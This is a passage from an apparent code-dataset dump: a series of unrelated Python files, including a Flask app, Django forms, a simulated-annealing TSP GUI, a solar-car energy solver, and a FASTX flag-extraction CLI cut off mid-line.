content
stringlengths
0
1.05M
origin
stringclasses
2 values
type
stringclasses
2 values
from environment import environment as env class syscalls: """This class holds a framework for system calls and should ultimately depend on an architecture template I think. For now, it's basically a function map to allow programming system calls like you really would. """ def __init__(self): pass def call(self): """ Represents the 0x80 instruction. """ syscall_number = env.rax.val() # args = [env.ebx.val(), env.ecx.val(), env.edx.val(), env.esi.val(), env.edi.val(), env.ebp.val()] # handle stack args # Look up syscall_number in the function map, pass def getIdByName(self, name): """ Return a system call number based on the name of the syscall. env.mov(rax, sys.getIdByName('foo_bar')) """ try: value = self._map[name] except KeyError: raise KeyError("Invalid syscall name") return value
nilq/baby-python
python
from astute.__main__ import main from astute.__main__ import Icon if __name__ == '__main__': main(icon=Icon('astute/astute.ico'))
nilq/baby-python
python
# *ex2 - Escreve um programa com laço de repetição para o usuario encerra-lo apenas quando desejar, onde seu objetivo será fornecer a nota musical, bem como sua frequencia. bom base na tecla fornecida pelo usuario from os import system from time import sleep from cores import * def sair(): print(f'\t\t{cor["verde"]}Até mais!{cor["limpar"]}') sleep(1) quit() def do(): print(''' Nota: Dó Frequência: 262 Hz''') input() def re(): print(''' Nota: Ré Frequência: 294 Hz''') input() def mi(): print(''' Nota: Mi Frequência: 330 Hz''') input() def fa(): print(''' Nota: Fá Frequência: 349 Hz''') input() def sol(): print(''' Nota: Sol Frequência: 392 Hz''') input() def la(): print(''' Nota: Lá Frequência: 440 Hz''') input() def si(): print(''' Nota: Si Frequência: 494 Hz''') input() def erro(): # Caso insira um valor que n existe no dicionario print(f'{cor["vermelho"]}Escolha invalida. Tente novamente!{cor["limpar"]}') sleep(1) while True: system('cls') tecla = str(input(f''' {cor['verde']}> TECLA <{cor['limpar']} --------- C D E F G A B {cor['vermelho']}SAIR{cor['limpar']} {cor['amarelo']}Insira a tecla:{cor['limpar']} ''')).lower().strip() operacoes = { 'c': do, 'd': re, 'e': mi, 'f': fa, 'g': sol, 'a': la, 'b': si, 'sair': sair } system('cls') print(operacoes.get(tecla, erro)())
nilq/baby-python
python
# coding: utf-8 # libraries import import json from flask import Flask, render_template, redirect, url_for, request, jsonify, flash from flask_zurb_foundation import Foundation from sqlalchemy_wrapper import SQLAlchemy app = Flask(__name__) # Configuration app.config["DEBUG"] = True from models import RandomData, db # Initializations foundation = Foundation(app) # Models # views @app.route("/") def index(): data = db.query(RandomData).all() return render_template( "index.html", data=data ) @app.route("/save", methods=["POST"]) def save(): # cogemos la data recibida returned_data = {} received_data = request.json try: new_random_data = RandomData(received_data) db.session.add(new_random_data) db.session.commit() returned_data["message"] = "Se Creó una nueva data aleatoria" returned_data["data"] = received_data returned_data["status"] = "success" except Exception as e: returned_data["message"] = "Hubo un error" returned_data["error"] = e returned_data["status"]= "alert" return jsonify(returned_data)
nilq/baby-python
python
class Solution(object): def match_note_to_magazine(self, ransom_note, magazine): if ransom_note is None or magazine is None: raise TypeError('ransom_note or magazine cannot be None') seen_chars = {} for char in magazine: if char in seen_chars: seen_chars[char] += 1 else: seen_chars[char] = 1 for char in ransom_note: try: seen_chars[char] -= 1 except KeyError: return False if seen_chars[char] < 0: return False return True
nilq/baby-python
python
# File : text.py # Author : Zhengkun Tian # Email : zhengkun.tian@outlook.com import torch import logging from otrans.data import * from torch.utils.data import Dataset class TextDataset(Dataset): def __init__(self, params, datadict, is_eval=False): self.params = params self.is_eval = is_eval self.src_unit2idx = load_vocab(params['src_vocab']) self.tgt_unit2idx = load_vocab(params['tgt_vocab']) self.reverse = params['reverse'] if 'reverse' in params else False if self.reverse: logging.info('Reverse the src and tgt sequence!') self.src_list = [] self.tgt_dict = {} for src_file in datadict['src']: with open(src_file, 'r', encoding='utf-8') as t: for line in t: parts = line.strip().split() utt_id = parts[0] label = [] for c in parts[1:]: label.append(self.src_unit2idx[c] if c in self.src_unit2idx else self.src_unit2idx[UNK_TOKEN]) self.src_list.append((utt_id, label)) for tgt_file in datadict['tgt']: with open(tgt_file, 'r', encoding='utf-8') as t: for line in t: parts = line.strip().split() utt_id = parts[0] label = [] for c in parts[1:]: label.append(self.tgt_unit2idx[c] if c in self.tgt_unit2idx else self.tgt_unit2idx[UNK_TOKEN]) self.tgt_dict[utt_id] = label assert len(self.src_list) == len(self.tgt_dict) self.lengths = len(self.src_list) def __getitem__(self, index): idx, src_seq = self.src_list[index] tgt_seq = self.tgt_dict[idx] if self.reverse: src_seq.reverse() tgt_seq.reverse() return idx, src_seq, tgt_seq def __len__(self): return self.lengths @property def src_vocab_size(self): return len(self.src_unit2idx) @property def tgt_vocab_size(self): return len(self.tgt_unit2idx) @property def src_idx2unit(self): return {i: c for (c, i) in self.src_unit2idx.items()} @property def tgt_idx2unit(self): return {i: c for (c, i) in self.tgt_unit2idx.items()}
nilq/baby-python
python
"""Custom test and setup properties for checkin pull_info provider.""" load("//container:providers.bzl", "PullInfo") def _pull_info_validation_test_impl(ctx): pull_info = ctx.attr.target[PullInfo] compare_script_file = ctx.actions.declare_file("compare.sh") compare_script = """#!/usr/bin/env bash function assert_equals(){ if [ "$2" != "$3" ]; then echo "Expected $1 to be '$2' but was '$3'" exit 1 fi } """ + """ assert_equals "base_image_registry" "{expected_registry}" "{actual_registry}" assert_equals "base_image_repository" "{expected_repository}" "{actual_repository}" assert_equals "base_image_digest" "{expected_digest}" "{actual_digest}" echo "PASSED" """.format( expected_registry = ctx.attr.expected_registry, actual_registry = pull_info.base_image_registry, expected_repository = ctx.attr.expected_repository, actual_repository = pull_info.base_image_repository, expected_digest = ctx.attr.expected_digest, actual_digest = pull_info.base_image_digest, ) ctx.actions.write(compare_script_file, compare_script, is_executable = True) return [DefaultInfo(executable = compare_script_file, runfiles = ctx.runfiles(files = [compare_script_file]))] pull_info_validation_test = rule( implementation = _pull_info_validation_test_impl, attrs = { "expected_digest": attr.string(mandatory = True), "expected_registry": attr.string(mandatory = True), "expected_repository": attr.string(mandatory = True), "target": attr.label(providers = [PullInfo]), }, test = True, )
nilq/baby-python
python
# Converting the main code to use datetime objects as well instead of just time objects # Took out defaults from the iter functions import time, math from datetime import datetime from models.energy import defaultModel, load_data, GPSCoordinate#, powerConsumption from models.Predictor import powerGeneration # function 1: Given velocity, find energy # Default start: Now, end: 5 PM (17:00) # energy change=energy generated-energy consumed def calc_dE(velocity, latitude, longitude, altitude, start_time=time.strftime("%Y %m %d %H:%M", time.localtime()), end_time="17:00", cloudy=0): # Must convert end_time into a proper string # Format: Year Month Day Hour:Min if end_time == "17:00": end_time = time.strftime("%Y %m %d", time.localtime()) + " 17:00" it = iter_dE(velocity, latitude, longitude, start_time, end_time, cloudy) for (done, dE) in it: if done: return dE def iter_dE(velocity, latitude, longitude, start_time, end_time, cloudy): # Time Objects for Kevin's Program # Arguments should be in this format: "Year Month Day Hour:Min" # "2011 10 11 14:00" st = time.strptime(start_time, "%Y %m %d %H:%M") et = time.strptime(end_time, "%Y %m %d %H:%M") # Datetime Objects for Wesley's Program # Arguments should be in this format: "Year Month Day Hour:Min" # "2011 10 11 14:00" dST = datetime.strptime(start_time, "%Y %m %d %H:%M") dET = datetime.strptime(end_time, "%Y %m %d %H:%M") it = defaultModel.energy_loss_iterator(velocity, latitude, longitude, time.mktime(et)-time.mktime(st)) for (done, losses) in it: yield (False, -losses) if done: break yield (True, powerGeneration(latitude, velocity, dST, dET, cloudy) - losses) def calc_V(energy, latitude, longitude, altitude, start_time = time.strftime("%Y %m %d %H:%M", time.localtime()), end_time="17:00", cloudy=0): # Must convert end_time into a proper string # Format: Year Month Day Hour:Min if end_time == "17:00": end_time = time.strftime("%Y %m %d", time.localtime()) + " 17:00" it = iter_V(energy, latitude, longitude, altitude, start_time, end_time, cloudy) for (done, velocity) in it: if done: return velocity # function 2: Given energy, find velocity def iter_V(energy, latitude, longitude, altitude, start_time, end_time, cloudy): # Start with an arbitrary average velocity... say...50 km/h velocity_guess = 50.0 # error_bound error = 0.01 # limit the number of iterations in case newton's method diverges iteration_limit = 200 current_iteration = 0 dv = 0.01 # Time Objects st = time.strptime(start_time, "%Y %m %d %H:%M") et = time.strptime(end_time, "%Y %m %d %H:%M") dt = time.mktime(et) - time.mktime(st) # Datetime Objects dST = datetime.strptime(start_time, "%Y %m %d %H:%M") dET = datetime.strptime(end_time, "%Y %m %d %H:%M") start = GPSCoordinate(latitude, longitude, altitude) # We try to find a velocity such that the energy generated - the energy # consumed = the specified energy change. In order to do this, we start # with a guess for the correct velocity and use Newton's method to get # closer and closer to the correct velocity. Newton's method is a method # to approximate the root of a function f(x) by starting with a guess of # the root and repeatedly updating the guess by finding the tangent to f(x) # at the guess and then finding the intersection of that tangent and the x # axis. This x-value of this intersection point is the new guess. while current_iteration < iteration_limit: energy_gen = powerGeneration(latitude, velocity_guess, dST, dET, cloudy) energy_loss = powerConsumption(start, velocity_guess, dt) energy_change = energy_gen - energy_loss if math.fabs(energy_change - energy) < error: yield (True, velocity_guess) print 'answer=',velocity_guess break else: # Update velocity guess value energy_gen = powerGeneration(latitude, velocity_guess+dv, dST, dET, cloudy) energy_loss = powerConsumption(start, velocity_guess+dv, dt) print 'powerGeneration: ', energy_gen print 'powerConsumption: ', energy_loss E_prime = ((energy_gen - energy_loss) - energy_change) / dv velocity_guess = velocity_guess - (energy_change - energy) / E_prime current_iteration += 1 yield (False, velocity_guess) if not(math.fabs(energy_change - energy) < error): # Sometime's Newton's method diverges, so we use a more reliable naive # method if Newton's fails to converge after the set amount of iterations. # Reset velocity_guess velocity_guess = 50.0 # Reset current_iteration current_iteration = 0 # Change limit iteration_limit = 1000 # Start with some increment amount increment_amount = 25.0 # Hold onto our previous guesses just in case... prev_guess = 0 # We assume that energy generated - energy consumed generally decreases # when velocity increases. So when the calculated energy change - the # desired change in energy at the guess velocity is positive, we increase # the guess velocity to get closer to the correct velocity. On the other # hand, if the calculated energy change - the desired change in energy at # the guess velocity is negative, we decrease the guess velocity to get # closer to the correct velocity. Everytime we change the direction in # which we increment the guess velocity, we know we have overshot the # correct velocity, so we half the increment amount to zero in on the # correct velocity. while current_iteration < iteration_limit: energy_gen = powerGeneration(latitude, velocity_guess, dST, dET, cloudy) energy_loss = powerConsumption(start, velocity_guess, dt) energy_change = energy_gen - energy_loss if math.fabs(energy_change-energy) < error: if velocity_guess < 0: print "Input energy too high -> velocity ended up negative." yield (True, velocity_guess) print 'answer=',velocity_guess break elif energy_change-energy > 0: #check to see if we overshot: if velocity_guess+increment_amount == prev_guess: increment_amount = increment_amount/2 prev_guess = velocity_guess velocity_guess += increment_amount else: #check to see if we overshot: if velocity_guess-increment_amount == prev_guess: increment_amount = increment_amount/2 prev_guess = velocity_guess velocity_guess -= increment_amount current_iteration += 1 yield (False, velocity_guess) if not(math.fabs(energy_change - energy) < error): # DOOM print "Max iterations exceeded. Try different inputs." yield (True, -1) # Dummy test functions ##def powerGeneration(latitude, velocity, start_time, end_time, cloudy): ## energy_change = (1-cloudy)*(time.mktime(end_time)-time.mktime(start_time)) ## return energy_change def powerConsumption((latitude, longitude, altitude), velocity, time): energy_eaten = 0.3*time*velocity return energy_eaten # Main Caller and Loop Function if __name__ == '__main__': # Previous calculation state: calcType = 0 energyState = 0 inputVelocity = 0 inputEnergy = 0 endTime = "0:00" #initialize route database: load_data() # User input loop while True: # Asks user whether to start a new calculation or modify the previous one operationType = raw_input("Enter 'n' to start a new calculation. Enter 'm' to modify a previous calculation. ") if operationType=="n": # Starting new calculation calcType=raw_input("Enter 'v' to calculate the average velocity given a change in battery energy. Enter 'e' to calculate change in battery energy given an average velocity. ") # Calculate velocity given a change in energy if calcType=="v": inputEnergy=raw_input("Please enter the desired energy change: ") longitude=raw_input("Please enter your current longitude coordinate: ") lat=raw_input("Please enter your current latitude coordinate: ") alt=raw_input("Please enter your current altitude: ") startTime=raw_input("Please enter your desired start time. Format: 'year month day hr:min' (24 hr time) If you leave this field blank, 'now' will be the start time. ") if startTime=="": print ("Start time defaulted to now") startTime=time.strftime("%Y %m %d %H:%M",time.localtime()) endTime=raw_input("Please enter your desired end time. Format: 'year month day hr:min' (24 hr time) If you leave this field blank, 17:00 will be the start time. ") if endTime=="": print ("End time defaulted to today at 17:00") # Default endTime will be handled along the way endTime="17:00" energyState=raw_input("Please enter the energy level (in MJ) of the batteries at the start location: ") cloudiness=raw_input("Please enter a projected %cloudy value [0,1]. If you leave this field blank, historical values will be used. ") if cloudiness=="": cloudiness=-1 print str(calc_V(float(inputEnergy),float(longitude),float(lat),float(alt),startTime,endTime,float(cloudiness))) + "km/h" # Calculate change in energy given a velocity if calcType=="e": inputVelocity=raw_input("Please enter the desired average velocity: ") longitude=raw_input("Please enter your current longitude coordinate: ") lat=raw_input("Please enter your current latitude coordinate: ") alt=raw_input("Please enter your current altitude: ") startTime=raw_input("Please enter your desired start time. Format: 'year month day hr:min' (24 hr time) If you leave this field blank, 'now' will be the start time. ") if startTime=="": print ("Start time defaulted to now") startTime=time.strftime("%Y %m %d %H:%M",time.localtime()) endTime=raw_input("Please enter your desired end time. Format: 'hr:min' (24 hr time) If you leave this field blank, 17:00 will be the start time. ") if endTime=="": print ("End time defaulted to today at 17:00") # This'll be handled later endTime="17:00" energyState=raw_input("Please enter the energy level (in MJ) of the batteries at the start location: ") cloudiness=raw_input("Please enter a projected %cloudy value [0,1]. If you leave this field blank, historical values will be used. ") if cloudiness=="": cloudiness=-1 print str(calc_dE(float(inputVelocity),float(longitude),float(lat), float(alt), startTime,endTime,float(cloudiness))) + "MJ" elif operationType == "m" and type!=0: # Modifying previous calculation ce = raw_input("Please enter the current energy of the car: ") currentEnergy = float(ce) newEnergy = float(inputEnergy) - (currentEnergy - float(energyState)) clouds = raw_input("Please enter a new %cloudy value [0,1]: ") cloudiness = float(clouds) newLongitude = raw_input("Please enter a new longitude value: ") longitude = float(newLongitude) newLat = raw_input("Please enter a new latitude value: ") lat = float(newLat) startTime = time.strftime("%Y %m %d %H:%M", time.localtime()) if type == "v": # Calculate velocity given a change in energy print str(calc_V(newEnergy, longitude, lat, startTime, endTime, cloudiness))+ "km/h" else: # Calculate change in energy given a velocity print str(calc_dE(float(inputVelocity), longitude, lat, startTime, endTime, cloudiness) + (currentEnergy - float(energyState))+"MJ")
nilq/baby-python
python
#!/usr/bin/env python3 #ccc 2021 senior 10/15 from sys import stdin from itertools import repeat m = int(stdin.readline()) n = int(stdin.readline()) k = int(stdin.readline()) canvas = [] for _ in range(m): canvas.append(list(repeat(False,n))) gold = 0 for _ in range(k): query = stdin.readline().split() query[1] = int(query[1]) if query[0] == 'R': for i in range(n): if canvas[query[1]-1][i]: gold -= 1 else: gold += 1 canvas[query[1]-1][i] = not canvas[query[1]-1][i] if query[0] == 'C': for i in range(m): if canvas[i][query[1]-1]: gold -= 1 else: gold += 1 canvas[i][query[1]-1] = not canvas[i][query[1]-1] print(gold)
nilq/baby-python
python
import requests import json from . import filler, models VALID_HTTP_METHODS = { 'GET': ['url'], 'PATCH': ['url', 'data'], 'PUT': ['url', 'data'], 'POST': ['url', 'data'], 'DELETE': ['url'], } def call(step, responses, config: models.SuiteConfig): """ Main API Caller :param step: :param responses: :param config: :return: """ req = step.get('request') validate_request(req) method = req.get('method', None) url = filler.fill_regex(req['url'].replace('{{baseUrl}}', config.base_url), responses) payload = req.get('data', None) if payload is not None: payload_clean = filler.fill_regex(payload, responses) payload = json.loads(payload_clean) headers = None print('Calling {method} @ {url}'.format(method=method, url=url)) response_raw = requests.request(method=method, url=url, json=payload, headers=headers) response_json = {} try: response_json = response_raw.json() except ValueError: print('Invalid json') # no JSON: nothing to do print('Response ({number}) {status}: {response}'.format(number=len(responses), status=response_raw.status_code, response=json.dumps(response_json))) response = build_response(step, response_raw, payload) return response def mock(step, responses): response = step.get('response') response_filled = filler.fill_regex(response, responses) response_json = json.loads(response_filled) return build_response_mock(step, response_json) def build_response(step, response_raw, payload): response = { "type": "HTTP", "name": step.get("name", "Unnamed Request"), "description": step.get("name", "Undescribed Request"), "headers": dict(response_raw.headers), "body": response_raw.text, "status": response_raw.status_code, "request": { "body": payload, "headers": dict(response_raw.request.headers), "method": response_raw.request.method, "url": response_raw.request.url } } try: response["json"] = response_raw.json() except json.JSONDecodeError: print('Unable to parse json response') response["json"] = None return response def build_response_mock(step, response_json): return { "type": "MOCK", "name": step.get("name", "Unnamed Request"), "description": step.get("name", "Undescribed Request"), "json": response_json } # simple validation def validate_request(req): name = req.get('name', 'UNNAMED REQUEST') method = req.get('method', None) if method is None: raise Exception('MISSING METHOD') if method not in VALID_HTTP_METHODS.keys(): raise Exception('INVALID METHOD {method}'.format(method=method)) configs = VALID_HTTP_METHODS.get(method) for config in configs: if req.get(config, None) is None: raise Exception('MISSING {config} FROM {name}'.format(config=config, name=name)) return True
nilq/baby-python
python
''' Created on 1.12.2016 @author: Darren '''''' Median is the middle value in an ordered integer list. If the size of the list is even, there is no middle value. So the median is the mean of the two middle value. Examples: [2,3,4] , the median is 3 [2,3], the median is (2 + 3) / 2 = 2.5 Design a data structure that supports the following two operations: void addNum(int num) - Add a integer number from the data stream to the data structure. double findMedian() - Return the median of all elements so far. For example: add(1) add(2) findMedian() -> 1.5 add(3) findMedian() -> 2 Credits:Special thanks to @Louis1992 for adding this problem and creating all test cases." ''' from heapq import * class MedianFinder: def __init__(self): self.heaps = [], [] def addNum(self, num): small, large = self.heaps heappush(small, -heappushpop(large, num)) if len(large) < len(small): heappush(large, -heappop(small)) def findMedian(self): small, large = self.heaps if len(large) > len(small): return float(large[0]) return (large[0] - small[0]) / 2.0 nums=[1,2,3,4,5,6] mf=MedianFinder() for num in nums: mf.addNum(num) print(mf.findMedian())
nilq/baby-python
python
from tkinter import * import sys import os.path sys.path.append(os.path.join(os.path.dirname(__file__), '..')) from search import * import numpy as np distances = {} class TSP_problem(Problem): """ subclass of Problem to define various functions """ def two_opt(self, state): """ Neighbour generating function for Traveling Salesman Problem """ neighbour_state = state[:] left = random.randint(0, len(neighbour_state) - 1) right = random.randint(0, len(neighbour_state) - 1) if left > right: left, right = right, left neighbour_state[left: right + 1] = reversed(neighbour_state[left: right + 1]) return neighbour_state def actions(self, state): """ action that can be excuted in given state """ return [self.two_opt] def result(self, state, action): """ result after applying the given action on the given state """ return action(state) def path_cost(self, c, state1, action, state2): """ total distance for the Traveling Salesman to be covered if in state2 """ cost = 0 for i in range(len(state2) - 1): cost += distances[state2[i]][state2[i + 1]] cost += distances[state2[0]][state2[-1]] return cost def value(self, state): """ value of path cost given negative for the given state """ return -1 * self.path_cost(None, None, None, state) class TSP_Gui(): """ Class to create gui of Traveling Salesman using simulated annealing where one can select cities, change speed and temperature. Distances between cities are euclidean distances between them. """ def __init__(self, root, all_cities): self.root = root self.vars = [] self.frame_locations = {} self.calculate_canvas_size() self.button_text = StringVar() self.button_text.set("Start") self.all_cities = all_cities self.frame_select_cities = Frame(self.root) self.frame_select_cities.grid(row=1) self.frame_canvas = Frame(self.root) self.frame_canvas.grid(row=2) Label(self.root, text="Map of Romania", font="Times 13 bold").grid(row=0, columnspan=10) def create_checkboxes(self, side=LEFT, anchor=W): """ To select cities which are to be a part of Traveling Salesman Problem """ row_number = 0 column_number = 0 for city in self.all_cities: var = IntVar() var.set(1) Checkbutton(self.frame_select_cities, text=city, variable=var).grid( row=row_number, column=column_number, sticky=W) self.vars.append(var) column_number += 1 if column_number == 10: column_number = 0 row_number += 1 def create_buttons(self): """ Create start and quit button """ Button(self.frame_select_cities, textvariable=self.button_text, command=self.run_traveling_salesman).grid(row=3, column=4, sticky=E + W) Button(self.frame_select_cities, text='Quit', command=self.root.destroy).grid( row=3, column=5, sticky=E + W) def run_traveling_salesman(self): """ Choose selected citites """ cities = [] for i in range(len(self.vars)): if self.vars[i].get() == 1: cities.append(self.all_cities[i]) tsp_problem = TSP_problem(cities) self.button_text.set("Reset") self.create_canvas(tsp_problem) def calculate_canvas_size(self): """ Width and height for canvas """ minx, maxx = sys.maxsize, -1 * sys.maxsize miny, maxy = sys.maxsize, -1 * sys.maxsize for value in romania_map.locations.values(): minx = min(minx, value[0]) maxx = max(maxx, value[0]) miny = min(miny, value[1]) maxy = max(maxy, value[1]) # New locations squeezed to fit inside the map of romania for name, coordinates in romania_map.locations.items(): self.frame_locations[name] = (coordinates[0] / 1.2 - minx + 150, coordinates[1] / 1.2 - miny + 165) canvas_width = maxx - minx + 200 canvas_height = maxy - miny + 200 self.canvas_width = canvas_width self.canvas_height = canvas_height def create_canvas(self, problem): """ creating map with cities """ map_canvas = Canvas(self.frame_canvas, width=self.canvas_width, height=self.canvas_height) map_canvas.grid(row=3, columnspan=10) current = Node(problem.initial) map_canvas.delete("all") self.romania_image = PhotoImage(file="../images/romania_map.png") map_canvas.create_image(self.canvas_width / 2, self.canvas_height / 2, image=self.romania_image) cities = current.state for city in cities: x = self.frame_locations[city][0] y = self.frame_locations[city][1] map_canvas.create_oval(x - 3, y - 3, x + 3, y + 3, fill="red", outline="red") map_canvas.create_text(x - 15, y - 10, text=city) self.cost = StringVar() Label(self.frame_canvas, textvariable=self.cost, relief="sunken").grid( row=2, columnspan=10) self.speed = IntVar() speed_scale = Scale(self.frame_canvas, from_=500, to=1, orient=HORIZONTAL, variable=self.speed, label="Speed ----> ", showvalue=0, font="Times 11", relief="sunken", cursor="gumby") speed_scale.grid(row=1, columnspan=5, sticky=N + S + E + W) self.temperature = IntVar() temperature_scale = Scale(self.frame_canvas, from_=100, to=0, orient=HORIZONTAL, length=200, variable=self.temperature, label="Temperature ---->", font="Times 11", relief="sunken", showvalue=0, cursor="gumby") temperature_scale.grid(row=1, column=5, columnspan=5, sticky=N + S + E + W) self.simulated_annealing_with_tunable_T(problem, map_canvas) def exp_schedule(k=100, lam=0.03, limit=1000): """ One possible schedule function for simulated annealing """ return lambda t: (k * math.exp(-lam * t) if t < limit else 0) def simulated_annealing_with_tunable_T(self, problem, map_canvas, schedule=exp_schedule()): """ Simulated annealing where temperature is taken as user input """ current = Node(problem.initial) while(1): T = schedule(self.temperature.get()) if T == 0: return current.state neighbors = current.expand(problem) if not neighbors: return current.state next = random.choice(neighbors) delta_e = problem.value(next.state) - problem.value(current.state) if delta_e > 0 or probability(math.exp(delta_e / T)): map_canvas.delete("poly") current = next self.cost.set("Cost = " + str('%0.3f' % (-1 * problem.value(current.state)))) points = [] for city in current.state: points.append(self.frame_locations[city][0]) points.append(self.frame_locations[city][1]) map_canvas.create_polygon(points, outline='red', width=3, fill='', tag="poly") map_canvas.update() map_canvas.after(self.speed.get()) def main(): all_cities = [] for city in romania_map.locations.keys(): distances[city] = {} all_cities.append(city) all_cities.sort() # distances['city1']['city2'] contains euclidean distance between their coordinates for name_1, coordinates_1 in romania_map.locations.items(): for name_2, coordinates_2 in romania_map.locations.items(): distances[name_1][name_2] = np.linalg.norm( [coordinates_1[0] - coordinates_2[0], coordinates_1[1] - coordinates_2[1]]) distances[name_2][name_1] = np.linalg.norm( [coordinates_1[0] - coordinates_2[0], coordinates_1[1] - coordinates_2[1]]) root = Tk() root.title("Traveling Salesman Problem") cities_selection_panel = TSP_Gui(root, all_cities) cities_selection_panel.create_checkboxes() cities_selection_panel.create_buttons() root.mainloop() if __name__ == '__main__': main()
nilq/baby-python
python
import matplotlib.pyplot as plt from matplotlib.patches import Ellipse import matplotlib.animation as animation from matplotlib.text import OffsetFrom import numpy as np import csv a = [] b = [] with open('curvatest.csv','r') as csvfile: plots = csv.reader(csvfile, delimiter=',') for row in plots: a.append(float(row[0])/10) b.append(float(row[1])/10) print(a) t = np.linspace(1, 12, 26) out_a= np.asarray(b) out_b= np.asarray(a) x_watts = out_a ** 2 target_noise_db = 30 prom=0 text=r"80 OI " c_red=[1.0,0.5,0.5] c_blue=[0.5,0.5,1.0] color=c_blue fig, ax = plt.subplots(figsize=(3, 3)) el = Ellipse((2, -1), 0.5, 0.5) ax.add_patch(el) for i in range(10): plt.title('PEATC') plt.ylabel('Amplitud (uV)') plt.xlabel('Tiempo (ms)') #plt.yticks([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]) #plt.axis([0,12,0,18]) ax.grid(True) target_noise_db = target_noise_db - 1 target_noise_watts = 10 ** (target_noise_db / 10) mean_noise = 0 noise_volts = np.random.normal(mean_noise, np.sqrt(target_noise_watts), len(x_watts)) y_volts = out_a + noise_volts ytext=y_volts[0] xtext=out_b[0] prom=prom+1 line, = ax.plot(out_b, y_volts) ann = ax.annotate(text, xy=(xtext,ytext), xycoords='data', xytext=(8, 0), textcoords='offset points', size=30, va="center", bbox=dict(boxstyle="round", fc=(color), ec="none"), arrowprops=dict(arrowstyle="wedge,tail_width=1.", fc=(color), ec="none", patchA=None, patchB=el, relpos=(0.2, 0.5))) #ax.text(right, top, 'right bottom', # horizontalalignment='right', # verticalalignment='bottom', # transform=ax.transAxes) plt.pause(0.2) plt.cla() print("ok") plt.show()
nilq/baby-python
python
#!/usr/bin/env python import argparse parser = argparse.ArgumentParser(description='Gossip Chat via GPT2') parser.add_argument('-m', '--model', dest="model", help="pretrained model path") parser.add_argument('-c', '--config', dest="config", help="model config path") parser.add_argument('-p', '--port', dest='port', default=5000, help="listen port, default is 5000") parser.add_argument('--device', dest="device", default="cuda:0", help="choose to use cpu or cuda:x, default is cuda:0") parser.add_argument('--backend', dest='backend', default='shell', help="choose for backend from: shell, restful, default is shell") args = parser.parse_args() from gossipbot.backend import Backend s = Backend(backend_type=args.backend, model_path=args.model, config_path=args.config, device=args.device, port=args.port) s.run()
nilq/baby-python
python
from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User from django import forms from .models import Employee from django.forms import ModelForm, fields from .models import Order from .models import Customer from .models import Tag from .models import Product class ProductForm(ModelForm): class Meta: model = Tag fields = '__all__' class ProductForm(ModelForm): class Meta: model = Product fields = '__all__' class OrderForm(ModelForm): class Meta: model = Order fields = '__all__' class CustomerForm(forms.ModelForm): class Meta: model = Customer fields = ('name', 'phone', 'email') def __init__(self, *args, **kwargs): super(CustomerForm,self).__init__(*args, **kwargs) self.fields['email'].required = False self.fields['phone'].required = False class EmployeeForm(forms.ModelForm): class Meta: model = Employee fields = ('fullname','age','gender','email','mobile','emp_code','position') labels = { 'fullname': 'Full Name', 'age': 'Age', 'gender': 'Gender', 'email': 'Email', 'mobile': 'Mobile Number', 'emp_code':'Employee Code', 'position': 'Position', } def __init__(self, *args, **kwargs): super(EmployeeForm,self).__init__(*args, **kwargs) self.fields['gender'].empty_label = "Select" self.fields['position'].empty_label = "Select" self.fields['emp_code'].required = True class CreateUserForm(UserCreationForm): class Meta: model = User fields = ['username', 'email', 'password1', 'password2']
nilq/baby-python
python
from django.http import HttpResponse from django.shortcuts import reverse from django.views import View class HeavenTestAPIView(View): def get(self, request): link_format = "<a href='{reversed_link}'>{link}</a>" example_urls = [link_format.format(reversed_link=reverse(link), link=link) for link in ( 'example_http', 'example_json', 'example_json_proxy', 'example_redirect', )] try: example_urls += [ link_format.format(reversed_link=reverse(link), link=link) for link in ['example_rest', 'example_rest_proxy'] ] except Exception: pass return HttpResponse("<br>".join(example_urls))
nilq/baby-python
python
""" @author: Gabriele Girelli @contact: gigi.ga90@gmail.com """ import argparse from fastx_barber import scriptio from fastx_barber.const import PATTERN_EXAMPLE, FlagData from fastx_barber.exception import enable_rich_assert from fastx_barber.flag import ( FastqFlagExtractor, FlagStats, get_fastx_flag_extractor, ) from fastx_barber.io import ChunkMerger from fastx_barber.match import AlphaNumericPattern, FastxMatcher from fastx_barber.qual import setup_qual_filters from fastx_barber.scriptio import get_handles, get_split_handles from fastx_barber.scripts import arguments as ap from fastx_barber.seqio import ( get_fastx_format, SimpleFastxRecord, SimpleFastxWriter, SimpleSplitFastxWriter, ) from fastx_barber.trim import get_fastx_trimmer import joblib # type: ignore import logging import regex as re # type: ignore from rich.logging import RichHandler # type: ignore import sys from typing import Dict, List, Tuple, Union logging.basicConfig( level=logging.INFO, format="%(message)s", handlers=[RichHandler(markup=True, rich_tracebacks=True)], ) def init_parser(subparsers: argparse._SubParsersAction) -> argparse.ArgumentParser: parser = subparsers.add_parser( "extract", description="Extract flags and trim the records of a FASTX file.", formatter_class=argparse.RawDescriptionHelpFormatter, help="Extract flags and trim the records of a FASTX file.", ) parser.add_argument( "input", type=str, metavar="in.fastx[.gz]", help="""Path to the fasta/q file to trim.""", ) parser.add_argument( "output", type=str, metavar="out.fastx[.gz]", help="Path to fasta/q file where to write trimmed records. " + "Format will match the input.", ) parser.add_argument( "--pattern", type=str, help="Pattern to match to reads and extract flagged groups. " + f"Remember to use quotes. Example: '{PATTERN_EXAMPLE}'", ) parser = ap.add_version_option(parser) advanced = parser.add_argument_group("advanced arguments") advanced = ap.add_unmatched_output_option(advanced) advanced = ap.add_flag_delim_option(advanced) advanced.add_argument( "--selected-flags", type=str, nargs="+", help="Space-separated names of flags to be extracted. " + "By default it extracts all flags.", ) advanced = ap.add_flagstats_option(advanced) advanced = ap.add_split_by_option(advanced) advanced = ap.add_filter_qual_flags_option(advanced) advanced = ap.add_filter_qual_output_option(advanced) advanced = ap.add_phred_offset_option(advanced) advanced.add_argument( "--no-qual-flags", action="store_const", dest="qual_flags", const=False, default=True, help="Do not extract quality flags (when running on a fastq file).", ) advanced.add_argument( "--simple-pattern", action="store_const", dest="simple_pattern", const=True, default=False, help="Parse pattern as 'simple' (alphanumeric) pattern.", ) advanced = ap.add_comment_space_option(advanced) advanced = ap.add_compress_level_option(advanced) advanced = ap.add_log_file_option(advanced) advanced = ap.add_chunk_size_option(advanced) advanced = ap.add_threads_option(advanced) advanced = ap.add_tempdir_option(advanced) parser.set_defaults(parse=parse_arguments, run=run) return parser @enable_rich_assert def parse_arguments(args: argparse.Namespace) -> argparse.Namespace: assert 1 == len(args.flag_delim) args.threads = ap.check_threads(args.threads) args = 